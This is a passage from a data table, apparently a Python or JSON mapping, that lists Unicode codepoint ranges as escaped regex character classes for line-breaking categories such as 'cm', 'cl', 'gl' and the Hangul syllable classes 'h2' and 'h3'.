\u09f8\u09fa\u0a05-\u0a0a\u0a0f-\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32-\u0a33\u0a35-\u0a36\u0a38-\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2-\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0-\u0ae1\u0af0\u0b05-\u0b0c\u0b0f-\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32-\u0b33\u0b35-\u0b39\u0b3d\u0b5c-\u0b5d\u0b5f-\u0b61\u0b70-\u0b77\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99-\u0b9a\u0b9c\u0b9e-\u0b9f\u0ba3-\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0bf0-\u0bf8\u0bfa\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58-\u0c59\u0c60-\u0c61\u0c78-\u0c7f\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0-\u0ce1\u0cf1-\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60-\u0d61\u0d70-\u0d75\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0df4\u0e4f\u0f00\u0f05\u0f13\u0f15-\u0f17\u0f1a-\u0f1f\u0f2a-\u0f33\u0f36\u0f38\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u0fc0-\u0fc5\u0fc7-\u0fcc\u0fce-\u0fcf\u0fd4-\u0fd8\u104c-\u104f\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10ff\u1200-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1360\u1362-\u137c\u1380-\u1399\u13a0-\u13f4\u1401-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u17d9\u17f0-\u17f9\u1800-\u1801\u1807\u180a\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1940\u19e0-\u1a16\u1a1e-\u1a1f\u1b05-\u1b33\u1b45-\u1b4b\u1b5c\u1b61-\u1b6a\u1b74-\u1b7c\u1b83-\u1ba0\u1bae-\u1baf\u1bba-\u1be5\u1bfc-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1cc0-\u1cc7\u1cd3\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5-\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fc4\u1fc6-\u1fd3\u1fd6-\u1fdb\u1fdd-\u1fef\u1ff2-\u1ff4\u1ff6-\u1ffc\u1ffe\u2017\u2022-\u2023\u2038\u203e-\u2043\u204a-\u2055\u2057\u205c\u2061-\u2064\u2070-\u2071\u2075-\u207c\u2080\u2085-\u208c\u2090-\u209c\u2100-\u2102\u2104\u2106-\u2108\u210a-\u2112\u2114-\u2115\u2117-\u2120\u2123-\u212a\u212c-\u2153\u2156-\u215a\u215c-\u215d\u215f\u216c-\u216f\u217a-\u2188\u219a-\u21d1\u21d3\u21d5-\u21ff\u2201\u2204-\u2206\u2209-\u220a\u220c-\u220e\u2210\u2214\u2216-\u2219\u221b-\u221c\u2221-\u2222\u2224\u2226\u222d\u222f-\u2233\u2238-\u223b\u223e-\u2247\u2249-\u224b\u224d-\u2251\u2253-\u225f\u2262-\u2263\u2268-\u2269\u226c-\u226d\u2270-\u2281\u2284-\u2285\u2288-\u2294\u2296-\u2298\u229a-\u22a4\u22a6-\u22be\u22c0-\u2311\u2313-\u2328\u232b-\u23f3\u2400-\u2426\u2440-\u244a\u24ff\u254c-\u254f\u2575-\u257f\u2590-\u2591\u2596-\u259f\u25a2\u25aa-\u25b1\u25b4-\u25b5\u25b8-\u25bb\u25be-\u25bf\u25c2-\u25c5\u25c9-\u25ca\u25cc-\u25cd\u25d2-\u25e1\u25e6-\u25ee\u25f0-\u2604\u2607-\u2608\u260a-\u260d\u2610-\u2613\u2618-\u261b\u261d\u261f-\u263f\u2641\u2643-\u265f\u2662\u2666\u266b\u266e\u2670-\u269d\u26a0-\u26bd\u26c0-\u26c3\u26ce\u26e2\u26e4-\u26e7\u2701-\u2756\u2758-\u275a\u275f-\u2761\u2764-\u2767\u2794-\u27c4\u27c7-\u27e5\u27f0-\u2982\u2999-\u29d7\u29dc-\u29fb\u29fe-\u2b4c\u2b50-\u2b54\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2cee\u2cf2-\u2cf3\u2cfd\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e16\u2e1a-\u2e1b\u2e1e-\u2e1f\u2e2f\u2e32\u2e35-\u2e39\u4dc0-\u4dff\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a-\ua62b\ua640-\ua66e\ua673\ua67e-\ua697\ua6a0-\ua6ef\ua6f2\ua700-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua828-\ua82b\ua830-\ua837\ua839\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8fb\ua90a-\ua925\ua930-\ua946\ua95f\ua984-\ua9b2\ua9c1-\ua9c6\ua9ca-\ua9cd\ua9cf\ua9de-\ua9df\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa5c\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\ufb00-\ufb06\ufb13-\ufb17\ufb29\ufb50-\ufbc1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufdfd\ufe70-\ufe74\ufe76-\ufefc\uff66\uff71-\uff9d\uffa0-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc\uffe8-\uffee\U00010000-\U0001000b\U0001000d-\U00010026\U00010028-\U0001003a\U0001003c-\U0001003d\U0001003f-\U0001004d\U00010050-\U0001005d\U00010080-\U000100fa\U00010107-\U00010133\U00010137-\U0001018a\U00010190-\U0001019b\U000101d0-\U000101fc\U00010280-\U0001029c\U000102a0-\U000102d0\U00010300-\U0001031e\U00010320-\U00010323\U00010330-\U0001034a\U00010380-\U0001039d\U000103a0-\U000103c3\U000103c8-\U000103cf\U000103d1-\U000103d5\U00010400-\U0001049d\U00010800-\U00010805\U00010808\U0001080a-\U00010835\U00010837-\U00010838\U0001083c\U0001083f-\U00010855\U00010858-\U0001085f\U00010900-\U0001091b\U00010920-\U00010939\U0001093f\U00010980-\U000109b7\U000109be-\U000109bf\U00010a00\U00010a10-\U00010a13\U00010a15-\U00010a17\U00010a19-\U00010a33\U00010a40-\U00010a47\U00010a58\U00010a60-\U00010a7f\U00010b00-\U00010b35\U00010b40-\U00010b55\U00010b58-\U00010b72\U00010b78-\U00010b7f\U00010c00-\U00010c48\U00010e60-\U00010e7e\U00011003-\U00011037\U00011049-\U0001104d\U00011052-\U00011065\U00011083-\U000110af\U000110bb-\U000110bd\U000110d0-\U000110e8\U00011103-\U00011126\U00011183-\U000111b2\U000111c1-\U000111c4\U000111c7\U00011680-\U000116aa\U00012000-\U0001236e\U00012400-\U00012462\U00013000-\U00013257\U0001325e-\U00013281\U00013283-\U00013285\U0001328a-\U00013378\U0001337c-\U0001342e\U00016800-\U00016a38\U00016f00-\U00016f44\U00016f50\U00016f93-\U00016f9f\U0001d000-\U0001d0f5\U0001d100-\U0001d126\U0001d129-\U0001d164\U0001d16a-\U0001d16c\U0001d183-\U0001d184\U0001d18c-\U0001d1a9\U0001d1ae-\U0001d1dd\U0001d200-\U0001d241\U0001d245\U0001d300-\U0001d356\U0001d360-\U0001d371\U0001d400-\U0001d454\U0001d456-\U0001d49c\U0001d49e-\U0001d49f\U0001d4a2\U0001d4a5-\U0001d4a6\U0001d4a9-\U0001d4ac\U0001d4ae-\U0001d4b9\U0001d4bb\U0001d4bd-\U0001d4c3\U0001d4c5-\U0001d505\U0001d507-\U0001d50a\U0001d50d-\U0001d514\U0001d516-\U0001d51c\U0001d51e-\U0001d539\U0001d53b-\U0001d53e\U0001d540-\U0001d544\U0001d546\U0001d54a-\U0001d550\U0001d552-\U0001d6a5\U0001d6a8-\U0001d7cb\U0001ee00-\U0001ee03\U0001ee05-\U0001ee1f\U0001ee21-\U0001ee22\U0001ee24\U0001ee27\U0001ee29-\U0001ee32\U0001ee34-\U0001ee37\U0001ee39\U0001ee3b\U0001ee42\U0001ee47\U0001ee49\U0001ee4b\U0001ee4d-\U0001ee4f\U0001ee51-\U0001ee52\U0001ee54\U0001ee57\U0001ee59\U0001ee5b\U0001ee5d\U0001ee5f\U0001ee61-\U0001ee62\U0001ee64\U0001ee67-\U0001ee6a\U0001ee6c-\U0001ee72\U0001ee74-\U0001ee77\U0001ee79-\U0001ee7c\U0001ee7e\U0001ee80-\U0001ee89\U0001ee8b-\U0001ee9b\U0001eea1-\U0001eea3\U0001eea5-\U0001eea9\U0001eeab-\U0001eebb\U0001eef0-\U0001eef1\U0001f000-\U0001f02b\U0001f030-\U0001f093\U0001f0a0-\U0001f0ae\U0001f0b1-\U0001f0be\U0001f0c1-\U0001f0cf\U0001f0d1-\U0001f0df\U0001f12e\U0001f16a-\U0001f16b\U0001f1e6-\U0001f1ff\U0001f300-\U0001f320\U0001f330-\U0001f335\U0001f337-\U0001f37c\U0001f380-\U0001f393\U0001f3a0-\U0001f3c4\U0001f3c6-\U0001f3ca\U0001f3e0-\U0001f3f0\U0001f400-\U0001f43e\U0001f440\U0001f442-\U0001f4f7\U0001f4f9-\U0001f4fc\U0001f500-\U0001f53d\U0001f540-\U0001f543\U0001f550-\U0001f567\U0001f5fb-\U0001f640\U0001f645-\U0001f64f\U0001f680-\U0001f6c5\U0001f700-\U0001f773",
"b2": "\u2014\u2e3a-\u2e3b",
"ba": "\x09\x5c\x7c\xad\u058a\u05be\u0964-\u0965\u0e5a-\u0e5b\u0f0b\u0f34\u0f7f\u0f85\u0fbe-\u0fbf\u0fd2\u104a-\u104b\u1361\u1400\u1680\u16eb-\u16ed\u1735-\u1736\u17d4-\u17d5\u17d8\u17da\u1804-\u1805\u1b5a-\u1b5b\u1b5d-\u1b60\u1c3b-\u1c3f\u1c7e-\u1c7f\u2000-\u2006\u2008-\u200a\u2010\u2012-\u2013\u2027\u2056\u2058-\u205b\u205d-\u205f\u2cfa-\u2cfc\u2cff\u2d70\u2e0e-\u2e15\u2e17\u2e19\u2e2a-\u2e2d\u2e30-\u2e31\u2e33-\u2e34\ua4fe-\ua4ff\ua60d\ua60f\ua6f3-\ua6f7\ua8ce-\ua8cf\ua92e-\ua92f\ua9c7-\ua9c9\uaa5d-\uaa5f\uaaf0-\uaaf1\uabeb\U00010100-\U00010102\U0001039f\U000103d0\U00010857\U0001091f\U00010a50-\U00010a57\U00010b39-\U00010b3f\U00011047-\U00011048\U000110be-\U000110c1\U00011140-\U00011143\U000111c5-\U000111c6\U000111c8\U00012470-\U00012473",
"bb": "\xb4\u02c8\u02cc\u02df\u0f01-\u0f04\u0f06-\u0f07\u0f09-\u0f0a\u0fd0-\u0fd1\u0fd3\u1806\u1ffd\ua874-\ua875",
"bk": "\x0b-\x0c\u2028-\u2029",
"cb": "\ufffc",
"cj": "\u3041\u3043\u3045\u3047\u3049\u3063\u3083\u3085\u3087\u308e\u3095-\u3096\u30a1\u30a3\u30a5\u30a7\u30a9\u30c3\u30e3\u30e5\u30e7\u30ee\u30f5-\u30f6\u30fc\u31f0-\u31ff\uff67-\uff70",
"cl": "\x7d\u0f3b\u0f3d\u169c\u2046\u207e\u208e\u232a\u2769\u276b\u276d\u276f\u2771\u2773\u2775\u27c6\u27e7\u27e9\u27eb\u27ed\u27ef\u2984\u2986\u2988\u298a\u298c\u298e\u2990\u2992\u2994\u2996\u2998\u29d9\u29db\u29fd\u2e23\u2e25\u2e27\u2e29\u3001-\u3002\u3009\u300b\u300d\u300f\u3011\u3015\u3017\u3019\u301b\u301e-\u301f\ufd3f\ufe11-\ufe12\ufe18\ufe36\ufe38\ufe3a\ufe3c\ufe3e\ufe40\ufe42\ufe44\ufe48\ufe50\ufe52\ufe5a\ufe5c\ufe5e\uff09\uff0c\uff0e\uff3d\uff5d\uff60-\uff61\uff63-\uff64\U0001325b-\U0001325d\U00013282\U00013287\U00013289\U0001337a-\U0001337b",
"cm": "\x00-\x08\x0e-\x1f\x7f-\x84\x86-\x9f\u0300-\u034e\u0350-\u035b\u0363-\u036f\u0483-\u0489\u0591-\u05bd\u05bf\u05c1-\u05c2\u05c4-\u05c5\u05c7\u0610-\u061a\u064b-\u065f\u0670\u06d6-\u06dc\u06df-\u06e4\u06e7-\u06e8\u06ea-\u06ed\u0711\u0730-\u074a\u07a6-\u07b0\u07eb-\u07f3\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0859-\u085b\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0981-\u0983\u09bc\u09be-\u09c4\u09c7-\u09c8\u09cb-\u09cd\u09d7\u09e2-\u09e3\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47-\u0a48\u0a4b-\u0a4d\u0a51\u0a70-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47-\u0b48\u0b4b-\u0b4d\u0b56-\u0b57\u0b62-\u0b63\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0c01-\u0c03\u0c3e-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55-\u0c56\u0c62-\u0c63\u0c82-\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5-\u0cd6\u0ce2-\u0ce3\u0d02-\u0d03\u0d3e-\u0d44\u0d46-\u0d48\u0d4a-\u0d4d\u0d57\u0d62-\u0d63\u0d82-\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2-\u0df3\u0f18-\u0f19\u0f35\u0f37\u0f39\u0f3e-\u0f3f\u0f71-\u0f7e\u0f80-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u135d-\u135f\u1712-\u1714\u1732-\u1734\u1752-\u1753\u1772-\u1773\u180b-\u180d\u18a9\u1920-\u192b\u1930-\u193b\u1a17-\u1a1b\u1a7f\u1b00-\u1b04\u1b34-\u1b44\u1b6b-\u1b73\u1b80-\u1b82\u1ba1-\u1bad\u1be6-\u1bf3\u1c24-\u1c37\u1cd0-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1dc0-\u1de6\u1dfc-\u1dff\u200c-\u200f\u202a-\u202e\u206a-\u206f\u20d0-\u20f0\u2cef-\u2cf1\u2d7f\u2de0-\u2dff\u302a-\u302f\u3099-\u309a\ua66f-\ua672\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua802\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8e0-\ua8f1\ua926-\ua92d\ua947-\ua953\ua980-\ua983\ua9b3-\ua9c0\uaa29-\uaa36\uaa43\uaa4c-\uaa4d\uaaeb-\uaaef\uaaf5-\uaaf6\uabe3-\uabea\uabec-\uabed\ufb1e\ufe00-\ufe0f\ufe20-\ufe26\ufff9-\ufffb\U000101fd\U00010a01-\U00010a03\U00010a05-\U00010a06\U00010a0c-\U00010a0f\U00010a38-\U00010a3a\U00010a3f\U00011000-\U00011002\U00011038-\U00011046\U00011080-\U00011082\U000110b0-\U000110ba\U00011100-\U00011102\U00011127-\U00011134\U00011180-\U00011182\U000111b3-\U000111c0\U000116ab-\U000116b7\U00016f51-\U00016f7e\U00016f8f-\U00016f92\U0001d165-\U0001d169\U0001d16d-\U0001d182\U0001d185-\U0001d18b\U0001d1aa-\U0001d1ad\U0001d242-\U0001d244\U000e0001\U000e0020-\U000e007f\U000e0100-\U000e01ef",
"cp": "\x29\x5c\x5d",
"cr": "\x0d",
"ex": "\x21\x3f\u05c6\u061b\u061e-\u061f\u06d4\u07f9\u0f0d-\u0f11\u0f14\u1802-\u1803\u1808-\u1809\u1944-\u1945\u2762-\u2763\u2cf9\u2cfe\u2e2e\ua60e\ua876-\ua877\ufe15-\ufe16\ufe56-\ufe57\uff01\uff1f",
"gl": "\xa0\u034f\u035c-\u0362\u0f08\u0f0c\u0f12\u0fd9-\u0fda\u180e\u2007\u2011\u202f",
"h2": "\uac00\uac1c\uac38\uac54\uac70\uac8c\uaca8\uacc4\uace0\uacfc\uad18\uad34\uad50\uad6c\uad88\uada4\uadc0\uaddc\uadf8\uae14\uae30\uae4c\uae68\uae84\uaea0\uaebc\uaed8\uaef4\uaf10\uaf2c\uaf48\uaf64\uaf80\uaf9c\uafb8\uafd4\uaff0\ub00c\ub028\ub044\ub060\ub07c\ub098\ub0b4\ub0d0\ub0ec\ub108\ub124\ub140\ub15c\ub178\ub194\ub1b0\ub1cc\ub1e8\ub204\ub220\ub23c\ub258\ub274\ub290\ub2ac\ub2c8\ub2e4\ub300\ub31c\ub338\ub354\ub370\ub38c\ub3a8\ub3c4\ub3e0\ub3fc\ub418\ub434\ub450\ub46c\ub488\ub4a4\ub4c0\ub4dc\ub4f8\ub514\ub530\ub54c\ub568\ub584\ub5a0\ub5bc\ub5d8\ub5f4\ub610\ub62c\ub648\ub664\ub680\ub69c\ub6b8\ub6d4\ub6f0\ub70c\ub728\ub744\ub760\ub77c\ub798\ub7b4\ub7d0\ub7ec\ub808\ub824\ub840\ub85c\ub878\ub894\ub8b0\ub8cc\ub8e8\ub904\ub920\ub93c\ub958\ub974\ub990\ub9ac\ub9c8\ub9e4\uba00\uba1c\uba38\uba54\uba70\uba8c\ubaa8\ubac4\ubae0\ubafc\ubb18\ubb34\ubb50\ubb6c\ubb88\ubba4\ubbc0\ubbdc\ubbf8\ubc14\ubc30\ubc4c\ubc68\ubc84\ubca0\ubcbc\ubcd8\ubcf4\ubd10\ubd2c\ubd48\ubd64\ubd80\ubd9c\ubdb8\ubdd4\ubdf0\ube0c\ube28\ube44\ube60\ube7c\ube98\ubeb4\ubed0\ubeec\ubf08\ubf24\ubf40\ubf5c\ubf78\ubf94\ubfb0\ubfcc\ubfe8\uc004\uc020\uc03c\uc058\uc074\uc090\uc0ac\uc0c8\uc0e4\uc100\uc11c\uc138\uc154\uc170\uc18c\uc1a8\uc1c4\uc1e0\uc1fc\uc218\uc234\uc250\uc26c\uc288\uc2a4\uc2c0\uc2dc\uc2f8\uc314\uc330\uc34c\uc368\uc384\uc3a0\uc3bc\uc3d8\uc3f4\uc410\uc42c\uc448\uc464\uc480\uc49c\uc4b8\uc4d4\uc4f0\uc50c\uc528\uc544\uc560\uc57c\uc598\uc5b4\uc5d0\uc5ec\uc608\uc624\uc640\uc65c\uc678\uc694\uc6b0\uc6cc\uc6e8\uc704\uc720\uc73c\uc758\uc774\uc790\uc7ac\uc7c8\uc7e4\uc800\uc81c\uc838\uc854\uc870\uc88c\uc8a8\uc8c4\uc8e0\uc8fc\uc918\uc934\uc950\uc96c\uc988\uc9a4\uc9c0\uc9dc\uc9f8\uca14\uca30\uca4c\uca68\uca84\ucaa0\ucabc\ucad8\ucaf4\ucb10\ucb2c\ucb48\ucb64\ucb80\ucb9c\ucbb8\ucbd4\ucbf0\ucc0c\ucc28\ucc44\ucc60\ucc7c\ucc98\uccb4\uccd0\uccec\ucd08\ucd24\ucd40\ucd5c\ucd78\ucd94\ucdb0\ucdcc\ucde8\uce04\uce20\uce3c\uce58\uce74\uce90\uceac\ucec8\ucee4\ucf00\ucf1c\ucf38\ucf54\ucf70\ucf8c\ucfa8\ucfc4\ucfe0\ucffc\ud018\ud034\ud050\ud06c\ud088\ud0a4\ud0c0\ud0dc\ud0f8\ud114\ud130\ud14c\ud168\ud184\ud1a0\ud1bc\ud1d8\ud1f4\ud210\ud22c\ud248\ud264\ud280\ud29c\ud2b8\ud2d4\ud2f0\ud30c\ud328\ud344\ud360\ud37c\ud398\ud3b4\ud3d0\ud3ec\ud408\ud424\ud440\ud45c\ud478\ud494\ud4b0\ud4cc\ud4e8\ud504\ud520\ud53c\ud558\ud574\ud590\ud5ac\ud5c8\ud5e4\ud600\ud61c\ud638\ud654\ud670\ud68c\ud6a8\ud6c4\ud6e0\ud6fc\ud718\ud734\ud750\ud76c\ud788",
"h3": "\uac01-\uac1b\uac1d-\uac37\uac39-\uac53\uac55-\uac6f\uac71-\uac8b\uac8d-\uaca7\uaca9-\uacc3\uacc5-\uacdf\uace1-\uacfb\uacfd-\uad17\uad19-\uad33\uad35-\uad4f\uad51-\uad6b\uad6d-\uad87\uad89-\uada3\uada5-\uadbf\uadc1-\uaddb\uaddd-\uadf7\uadf9-\uae13\uae15-\uae2f\uae31-\uae4b\uae4d-\uae67\uae69-\uae83\uae85-\uae9f\uaea1-\uaebb\uaebd-\uaed7\uaed9-\uaef3\uaef5-\uaf0f\uaf11-\uaf2b\uaf2d-\uaf47\uaf49-\uaf63\uaf65-\uaf7f\uaf81-\uaf9b\uaf9d-\uafb7\uafb9-\uafd3\uafd5-\uafef\uaff1-\ub00b\ub00d-\ub027\ub029-\ub043\ub045-\ub05f\ub061-\ub07b\ub07d-\ub097\ub099-\ub0b3\ub0b5-\ub0cf\ub0d1-\ub0eb\ub0ed-\ub107\ub109-\ub123\ub125-\ub13f\ub141-\ub15b\ub15d-\ub177\ub179-\ub193\ub195-\ub1af\ub1b1-\ub1cb\ub1cd-\ub1e7\ub1e9-\ub203\ub205-\ub21f\ub221-\ub23b\ub23d-\ub257\ub259-\ub273\ub275-\ub28f\ub291-\ub2ab\ub2ad-\ub2c7\ub2c9-\ub2e3\ub2e5-\ub2ff\ub301-\ub31b\ub31d-\ub337\ub339-\ub353\ub355-\ub36f\ub371-\ub38b\ub38d-\ub3a7\ub3a9-\ub3c3\ub3c5-\ub3df\ub3e1-\ub3fb\ub3fd-\ub417\ub419-\ub433\ub435-\ub44f\ub451-\ub46b\ub46d-\ub487\ub489-\ub4a3\ub4a5-\ub4bf\ub4c1-\ub4db\ub4dd-\ub4f7\ub4f9-\ub513\ub515-\ub52f\ub531-\ub54b\ub54d-\ub567\ub569-\ub583\ub585-\ub59f\ub5a1-\ub5bb\ub5bd-\ub5d7\ub5d9-\ub5f3\ub5f5-\ub60f\ub611-\ub62b\ub62d-\ub647\ub649-\ub663\ub665-\ub67f\ub681-\ub69b\ub69d-\ub6b7\ub6b9-\ub6d3\ub6d5-\ub6ef\ub6f1-\ub70b\ub70d-\ub727\ub729-\ub743\ub745-\ub75f\ub761-\ub77b\ub77d-\ub797\ub799-\ub7b3\ub7b5-\ub7cf\ub7d1-\ub7eb\ub7ed-\ub807\ub809-\ub823\ub825-\ub83f\ub841-\ub85b\ub85d-\ub877\ub879-\ub893\ub895-\ub8af\ub8b1-\ub8cb\ub8cd-\ub8e7\ub8e9-\ub903\ub905-\ub91f\ub921-\ub93b\ub93d-\ub957\ub959-\ub973\ub975-\ub98f\ub991-\ub9ab\ub9ad-\ub9c7\ub9c9-\ub9e3\ub9e5-\ub9ff\uba01-\uba1b\uba1d-\uba37\uba39-\uba53\uba55-\uba6f\uba71-\uba8b\uba8d-\ubaa7\ubaa9-\ubac3\ubac5-\ubadf\ubae1-\ubafb\ubafd-\ubb17\ubb19-\ubb33\ubb35-\ubb4f\ubb51-\ubb6b\ubb6d-\ubb87\ubb89-\ubba3\ubba5-\ubbbf\ubbc1-\ubbdb\ubbdd-\ubbf7\ubbf9-\ubc13\ubc15-\ubc2f\ubc31-\ubc4b\ubc4d-\ubc67\ubc69-\ubc83\ubc85-\ubc9f\ubca1-\ubcbb\ubcbd-\ubcd7\ubcd9-\ubcf3\ubcf5-\ubd0f\ubd11-\ubd2b\ubd2d-\ubd47\ubd49-\ubd63\ubd65-\ubd7f\ubd81-\ubd9b\ubd9d-\ubdb7\ubdb9-\ubdd3\ubdd5-\ubdef\ubdf1-\ube0b\ube0d-\ube27\ube29-\ube43\ube45-\ube5f\ube61-\ube7b\ube7d-\ube97\ube99-\ubeb3\ubeb5-\ubecf\ubed1-\ubeeb\ubeed-\ubf07\ubf09-\ubf23\ubf25-\ubf3f\ubf41-\ubf5b\ubf5d-\ubf77\ubf79-\ubf93\ubf95-\ubfaf\ubfb1-\ubfcb\ubfcd-\ubfe7\ubfe9-\uc003\uc005-\uc01f\uc021-\uc03b\uc03d-\uc057\uc059-\uc073\uc075-\uc08f\uc091-\uc0ab\uc0ad-\uc0c7\uc0c9-\uc0e3\uc0e5-\uc0ff\uc101-\uc11b\uc11d-\uc137\uc139-\uc153\uc155-\uc16f\uc171-\uc18b\uc18d-\uc1a7\uc1a9-\uc1c3\uc1c5-\uc1df\uc1e1-\uc1fb\uc1fd-\uc217\uc219-\uc233\uc235-\uc24f\uc251-\uc26b\uc26d-\uc287\uc289-\uc2a3\uc2a5-\uc2bf\uc2c1-\uc2db\uc2dd-\uc2f7\uc2f9-\uc313\uc315-\uc32f\uc331-\uc34b\uc34d-\uc367\uc369-\uc383\uc385-\uc39f\uc3a1-\uc3bb\uc3bd-\uc3d7\uc3d9-\uc3f3\uc3f5-\uc40f\uc411-\uc42b\uc42d-\uc447\uc449-\uc463\uc465-\uc47f\uc481-\uc49b\uc49d-\uc4b7\uc4b9-\uc4d3\uc4d5-\uc4ef\uc4f1-\uc50b\uc50d-\uc527\uc529-\uc543\uc545-\uc55f\uc561-\uc57b\uc57d-\uc597\uc599-\uc5b3\uc5b5-\uc5cf\uc5d1-\uc5eb\uc5ed-\uc607\uc609-\uc623\uc625-\uc63f\uc641-\uc65b\uc65d-\uc677\uc679-\uc693\uc695-\uc6af\uc6b1-\uc6cb\uc6cd-\uc6e7\uc6e9-\uc703\uc705-\uc71f\uc721-\uc73b\uc73d-\uc757\uc759-\uc773\uc775-\uc78f\uc791-\uc7ab\uc7ad-\uc7c7\uc7c9-\uc7e3\uc7e5-\uc7ff\uc801-\uc81b\uc81d-\uc837\uc839-\uc853\uc855-\uc86f\uc871-\uc88b\uc88d-\uc8a7\uc8a9-\uc8c3\uc8c5-\uc8df\uc8e1-\uc8fb\uc8fd-\uc917\uc919-\uc933\uc935-\uc94f\uc951-\uc96b\uc96d-\uc987\uc989-\uc9a3\uc9a5-\uc9bf\uc9c1-\uc9db\uc9dd-\uc9f7\uc9f9-\uca13\uca15-\uca2f\uca31-\uca4b\uca4d-\uca67\uca69-\uca83\uca85-\uca9f\ucaa1-\ucabb\ucabd-\ucad7\ucad9-\ucaf3\ucaf5-\ucb0f\ucb11-\ucb2b\ucb2d-\ucb47\ucb49-\ucb63\ucb65-\ucb7f\ucb81-\ucb9b\ucb9d-\ucbb7\ucbb9-\ucbd3\ucbd5-\ucbef\ucbf1-\ucc0b\ucc0d-\ucc27\ucc29-\ucc43\ucc45-\ucc5f\ucc61-\ucc7b\ucc7d-\ucc97\ucc99-\uccb3\uccb5-\ucccf\uccd1-\ucceb\ucced-\ucd07\ucd09-\ucd23\ucd25-\ucd3f\ucd41-\ucd5b\ucd5d-\ucd77\ucd79-\ucd93\ucd95-\ucdaf\ucdb1-\ucdcb\ucdcd-\ucde7\ucde9-\uce03\uce05-\uce1f\uce21-\uce3b\uce3d-\uce57\uce59-\uce73\uce75-\uce8f\uce91-\uceab\ucead-\ucec7\ucec9-\ucee3\ucee5-\uceff\ucf01-\ucf1b\ucf1d-\ucf37\ucf39-\ucf53\ucf55-\ucf6f\ucf71-\ucf8b\ucf8d-\ucfa7\ucfa9-\ucfc3\ucfc5-\ucfdf\ucfe1-\ucffb\ucffd-\ud017\ud019-\ud033\ud035-\ud04f\ud051-\ud06b\ud06d-\ud087\ud089-\ud0a3\ud0a5-\ud0bf\ud0c1-\ud0db\ud0dd-\ud0f7\ud0f9-\ud113\ud115-\ud12f\ud131-\ud14b\ud14d-\ud167\ud169-\ud183\ud185-\ud19f\ud1a1-\ud1bb\ud1bd-\ud1d7\ud1d9-\ud1f3\ud1f5-\ud20f\ud211-\ud22b\ud22d-\ud247\ud249-\ud263\ud265-\ud27f\ud281-\ud29b\ud29d-\ud2b7\ud2b9-\ud2d3\ud2d5-\ud2ef\ud2f1-\ud30b\ud30d-\ud327\ud329-\ud343\ud345-\ud35f\ud361-\ud37b\ud37d-\ud397\ud399-\ud3b3\ud3b5-\ud3cf\ud3d1-\ud3eb\ud3ed-\ud407\ud409-\ud423\ud425-\ud43f\ud441-\ud45b